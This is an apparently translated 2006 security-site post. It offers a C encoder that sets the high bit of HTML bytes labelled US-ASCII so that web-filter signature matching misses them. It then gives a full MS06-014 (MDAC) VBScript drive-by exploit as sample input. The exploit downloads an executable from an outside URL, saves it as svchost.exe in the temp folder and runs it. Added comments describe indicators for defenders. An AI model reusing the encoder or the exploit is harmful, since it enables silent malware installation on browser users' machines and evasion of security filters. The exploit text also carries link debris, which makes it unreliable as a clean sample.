Generic detection-evasion ("free kill") technique for HTML web trojans ("net horse") - vulnerability warning - the black bar safety net

2006-11-14T00:00:00
ID MYHACK58:62200612873
Type myhack58
Reporter 佚名
Modified 2006-11-14T00:00:00

Description

I saw this vulnerability discussed by several experts on foreign websites, was impressed, and wrote an exploit for it. The principle is simple; experts can skip this. Example: ascii.exe hack.txt >hack.htm The vulnerability is independent of the server and depends on the client browser. What is handled at present is ASCII, which of course does not support Chinese characters; keep that in mind. */

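#include <stdio.h>

/*
 * ascii: copy a text file to stdout as an HTML page labelled US-ASCII, with
 * the top bit (0x80) set on every input byte.
 *
 * Usage: ascii srcfile > destfile
 *
 * Security context for filter and scanner authors: the emitted body contains
 * no plain 7-bit tag or script text, so a filter that matches ASCII
 * signatures on the raw bytes will not recognise it. The page attributes the
 * effect to the client browser, not the server: a client that ignores the top
 * bit of bytes in a document declared as US-ASCII still parses the body as
 * markup. Inspection should therefore canonicalise by the declared charset
 * before signature matching (for example mask to 7 bits, or reject bytes
 * >= 0x80 in content labelled US-ASCII).
 *
 * The banner is written to stdout, as in the original, so it precedes the
 * markup in a redirected output file.
 *
 * Returns 0 on success, -1 on a usage error or if srcfile cannot be opened.
 */
int main(int argc, char *argv[])
{
    FILE *fp;
    int ch; /* int, not char: fgetc() returns int so EOF stays distinct from byte 0xFF */

    printf("\n-- Bypassing of web filters by using ASCII Exploit By CoolDiyer --\n");

    if (argc < 2) {
        /* Diagnostics go to stderr so they do not end up in the redirected file. */
        fprintf(stderr, "\nUsage: \n\t %s srcfile >destfile\n", argv[0]);
        return -1;
    }

    fp = fopen(argv[1], "r");
    if (fp == NULL) {
        fprintf(stderr, "File %s open Error", argv[1]);
        return -1;
    }

    /* Specify the encoding as US-ASCII is a must */
    printf("\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=US-ASCII\" />\n<title>Bypassing of web filters by using ASCII Exploit By CoolDiyer</title>\n</head><body>\n");

    while ((ch = fgetc(fp)) != EOF) {
        /* Set the top bit of each byte; this is the whole transformation. */
        putchar(ch | 0x80);
    }

    fclose(fp);
    printf("\n</body></html>\n");

    /* The original returned -1 on every path, so success looked like failure. */
    return 0;
}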


Taking MS06-014 as an example, the source code is as follows:


<!--
  Sample input for the encoder above: a page whose title names the MS06-014
  (MDAC) remote code execution issue in Internet Explorer. The text is kept
  exactly as extracted, including the spaces after dots and the link debris
  inside two string literals.

  What the visible VBScript does, for analysts writing detections:
    - "on error resume next" suppresses script errors.
    - An <object> element is created with
      classid clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 and used as a factory
      (CreateObject) for an XMLHTTP object, a stream object whose ProgID is
      assembled from the fragments "Ado" + "db." + "Str" + "eam",
      Scripting.FileSystemObject and Shell.Application.
    - The URL held in `shell` is requested with GET; the response body is
      written through the stream and saved with savetofile under the name
      "svchost.exe" in the folder returned by GetSpecialFolder(2) (the
      temporary folder), then passed to ShellExecute.
    - The seturla..seturle values and the CAO0..CAO8 string assignments are not
      read anywhere in the visible script; they look like filler meant to
      disturb signature matching (NOTE(review): inferred, not stated by the page).

  Defensive takeaways: the classid, the fragment-built ProgID, the
  GetSpecialFolder(2) + savetofile + ShellExecute sequence and the URL are the
  observable indicators on this page; the fix for the underlying issue is the
  vendor update the title refers to (MS06-014).
-->
<html> <title>MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-0 1 4)</title> <script language="VBScript"> on error resume next shell = "<http://kakalover.googlepages.com/demo.exe"> Set CAOc = document. createElement("object") CAOc. setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" seturla="down" seturlb="file" seturlc="copy" seturld="exit" seturle="base" CAOi="! [](http://www.cnhacker.cn/images/keywords/microsoft.gif) Microsoft. XMLHTTP" Set CAOd = CAOc. CreateObject(CAOi,"") seturlf="Ado" seturlg="db." seturlh="Str" seturli="eam" CAOf=seturlf&seturlg&seturlh&seturli CAOg=CAOf set CAOa = CAOc. createobject(CAOg,"") CAOa. type = 1 CAOh="GET" CAOd. Open CAOh, shell, False CAOd. Send CAO9="svchost.exe" set CAOb = CAOc. createobject("Scripting. FileSystemObject","") set CAOe = CAOb. GetSpecialFolder(2) CAOa. open CAO8="CAOa. BuildPath(CAOa,CAO8)" CAO7="CAOb. BuildPath(CAOb,CAO7)" CAO6="CAOc. BuildPath(CAOd,CAO6)" CAO5="CAOd. BuildPath(CAOf,CAO5)" CAO4="CAOe. BuildPath(CAOg,CAO4)" CAO3="CAOf. BuildPath(CAOh,CAO4)" CAO2="CAOg. BuildPath(CAOi,CAO3)" CAO1="CAOh. BuildPath(CAOg,CAO1)" CAO0="CAOi. BuildPath(CAOk,CAO0)" CAO9= CAOb. BuildPath(CAOe,CAO9) CAOa. write CAOd. responseBody CAOa. savetofile CAO9,2 CAOa. close set CAOe = CAOc. createobject("Shell. Application","") CAOe. ShellExecute CAO9,BBS,BBS,"open",0 </script> </html>


After encoding with ascii.exe ie.htm >a.htm:


<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" /> <title>Bypassing of web filters by using ASCII Exploit By CoolDiyer</title> </head><body>